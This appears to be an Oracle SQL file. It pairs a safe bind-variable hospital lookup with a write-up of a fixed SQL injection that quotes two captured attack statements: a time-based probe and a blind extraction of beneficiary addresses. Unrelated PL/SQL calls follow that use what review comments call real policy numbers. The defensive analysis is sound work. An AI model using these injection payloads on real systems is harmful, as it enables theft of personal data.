/*********** Safe (injection-resistant) version of the hospital lookup ***********/
-- branchCode arrives through the framework's bind placeholder (#branchCode#,
-- iBatis-style): the value is sent to the database as a bind variable, so no
-- request content can ever become part of the SQL text. Contrast with the
-- $branchCode$ form further down, which splices the raw text into the statement.
-- Result: names of valid hospitals that have an official website and whose
-- branch_code is related to the given branch with relative_grade <= 0.
SELECT h.hospital_name
FROM hospital_information h
WHERE h.is_valid = 'Y'
  AND h.IS_EXIST_OFFICIAL_WEBSITE = 'Y'
  AND h.last_invalid_date IS NULL
  AND EXISTS (SELECT 1
              FROM branch_code_relation r
              WHERE r.branch_code = #branchCode#
                AND r.relative_grade <= 0
                AND r.relative_branch_code = h.branch_code);
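/*********** Injectable version — fixed; the original predicate is quoted below ***********/
-- The original query was written as
--     WHERE hi.branch_code LIKE '$branchCode$%'
-- $branchCode$ is literal text substitution, not a bind: the request value is
-- pasted into the SQL string. A value such as
--     88952634' AND <any predicate> AND 'x' LIKE 'x
-- closes the LIKE literal, appends attacker-chosen SQL, and re-opens a literal
-- so the template's trailing  %'  still parses (see the captured payloads below).
-- Fix: bind the value (#branchCode#) and build the prefix pattern in SQL.
-- Note the caller can still send '%' or '_' in the value; that only widens the
-- match and cannot alter the statement — add an ESCAPE clause if exact
-- prefix matching matters.
SELECT hi.hospital_name
FROM hospital_information hi
WHERE hi.branch_code LIKE #branchCode# || '%'
  AND hi.is_valid = 'Y'
  AND hi.IS_EXIST_OFFICIAL_WEBSITE = 'Y'
  AND hi.last_invalid_date IS NULL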
After an injection payload is substituted for `$branchCode$`, the statement the database actually executes becomes (two captured examples follow):
-- Injected statement 1, as the database received it.
-- The request value substituted for $branchCode$ was, in effect,
--   88952634' AND 3823 = (SELECT COUNT(*) FROM ALL_USERS T1, ..., T5) AND 'Ahea' LIKE 'Ahea
-- The first quote closes the template's LIKE literal; the trailing
-- 'Ahea' LIKE 'Ahea re-opens one so the template's own  %'  still parses.
-- The five-way cross join of ALL_USERS returns nothing useful; its cost is the
-- point: a noticeably slower response tells the sender the injected text was
-- executed (heavy-query, time-based probe; the 3823 / 'Ahea' values are
-- consistent with automated scanner output). No application data is read
-- by this one — it is the confirmation step before statement 2.
SELECT hi.hospital_name
FROM hospital_information hi
WHERE hi.branch_code LIKE '88952634'
-- heavy query: COUNT over |ALL_USERS|^5 rows
AND 3823 = (SELECT COUNT (*)
FROM ALL_USERS T1,
ALL_USERS T2,
ALL_USERS T3,
ALL_USERS T4,
ALL_USERS T5)
-- tail that re-balances the quotes against the template's trailing  %'
AND 'Ahea' LIKE 'Ahea%'
AND hi.is_valid = 'Y'
AND hi.IS_EXIST_OFFICIAL_WEBSITE = 'Y'
AND hi.last_invalid_date IS NULL
/********************** Injected statement 2 **********************/
-- Same injection point, now extracting data one bit at a time.
-- The CASE takes the first character of ADDRESS in the first row
-- (ROWNUM = 1) of PUBDATA.BENEFICIARY_INFO and tests its ASCII code > 1:
--   true  -> run the heavy ALL_USERS cross join (slow response; the outer
--            8808 = COUNT(*) comparison is then almost certainly false, but
--            the delay has already happened)
--   false -> return 8808 immediately, so 8808 = 8808 is true with no delay
-- Response time therefore answers one yes/no question per request; repeating
-- with other thresholds recovers the character, then the next position.
-- NVL(..., CHR(32)) maps a NULL address to a space so the probe never errors.
-- The target is beneficiary address data — personal data in a schema the
-- hospital lookup has no business reason to reach. Whether this succeeded
-- depends on what the application's DB account may SELECT in PUBDATA; with
-- least-privilege grants the probe fails even though the injection exists.
SELECT hi.hospital_name
FROM hospital_information hi
WHERE hi.branch_code LIKE '88952634'
-- timing oracle: cheap branch vs. heavy branch chosen by the extracted character
AND 8808 = (CASE
WHEN (ASCII (
SUBSTRC (
(SELECT NVL (
CAST (
ENTRY_VALUE AS VARCHAR (4000)),
CHR (32))
FROM (SELECT ADDRESS AS ENTRY_VALUE,
ROWNUM AS LIMIT
FROM PUBDATA.BENEFICIARY_INFO)
WHERE LIMIT = 1),
1,
1)) > 1)
THEN
(SELECT COUNT (*)
FROM ALL_USERS T1,
ALL_USERS T2,
ALL_USERS T3,
ALL_USERS T4,
ALL_USERS T5)
ELSE
8808
END)
-- tail that re-balances the quotes against the template's trailing  %'
AND 'bkhQ' LIKE 'bkhQ%'
AND hi.is_valid = 'Y'
AND hi.IS_EXIST_OFFICIAL_WEBSITE = 'Y'
AND hi.last_invalid_date IS NULL
-- Package procedure call examples (separate notes, unrelated to the injection
-- write-up above). Run each block on its own; as a SQL*Plus script each
-- `end;` would need a following `/` line.
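-- Calls l_pos_survival.proc_matu_idvl for one policy/product as of today and
-- prints the returned "<flag>:<message>". The original discarded both OUT
-- values, so a failed call left no trace; this now reports them like the
-- sibling blocks below. v_flag is sized like those siblings (varchar2(1000))
-- because the procedure's real flag width is not visible here.
-- NOTE(review): the policy number looks like a real production identifier
-- committed to source control — prefer a test fixture or bind it at run time.
declare
  v_flag    varchar2(1000);
  v_message varchar2(1000);
begin
  l_pos_survival.proc_matu_idvl(p_policy_no => '0066202060007702',
                                p_prod_seq  => 1,
                                p_proc_date => sysdate,
                                p_flag      => v_flag,
                                p_message   => v_message);
  dbms_output.put_line(v_flag || ':' || v_message);
end;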
-- Cash-value calculation for one policy/product as of today; prints
-- "<base cash value>:<dividend cash value>".
-- NOTE(review): l_flag / l_message are received but not printed, so a failed
-- call shows up only as empty values. The policy number looks like a real
-- production identifier committed to source — prefer a test fixture.
declare
  c_policy_no constant varchar2(15) := '000000033752524';
  l_base_cv   number;
  l_div_cv    number;
  l_flag      varchar2(10);
  l_message   varchar2(1000);
begin
  l_pos_pub.calc_product_cash_value(p_policy_no       => c_policy_no,
                                    p_prod_seq        => 1,
                                    p_calc_date       => sysdate,
                                    p_base_cash_value => l_base_cv,
                                    p_div_cash_value  => l_div_cv,
                                    p_flag            => l_flag,
                                    p_message         => l_message);
  dbms_output.put_line(l_base_cv || ':' || l_div_cv);
end;
-- Calls l_pos_survival.draw_survival_due_idvl for policy product 2 over the
-- 2023-07-31 .. 2023-08-31 window and prints "<flag>:<message>". Arguments
-- are positional because the procedure's formal names are not visible here.
-- NOTE(review): the policy number looks like a real production identifier
-- committed to source — prefer a test fixture.
declare
  l_from    date := date '2023-7-31';
  l_to      date := date '2023-8-31';
  l_flag    varchar2(1000);
  l_message varchar2(1000);
begin
  l_pos_survival.draw_survival_due_idvl('000000033757960', 2, l_from, l_to, l_flag, l_message);
  dbms_output.put_line(l_flag || ':' || l_message);
end;
-- Calls l_pos_survival.prepare_to_pay_single for one policy/product with a
-- calculation window starting 30 days before 2023-07-31 and ending
-- 2023-08-31, then prints "<flag>:<message>".
-- NOTE(review): the policy number looks like a real production identifier
-- committed to source — prefer a test fixture.
declare
  c_window_end constant date := date '2023-8-31';
  l_flag       varchar2(1000);
  l_message    varchar2(1000);
begin
  l_pos_survival.prepare_to_pay_single(p_policy_no       => '000000033757960',
                                       p_prod_seq        => 1,
                                       p_calc_start_date => date '2023-7-31' - 30,
                                       p_calc_end_date   => c_window_end,
                                       p_flag            => l_flag,
                                       p_message         => l_message);
  dbms_output.put_line(l_flag || ':' || l_message);
end;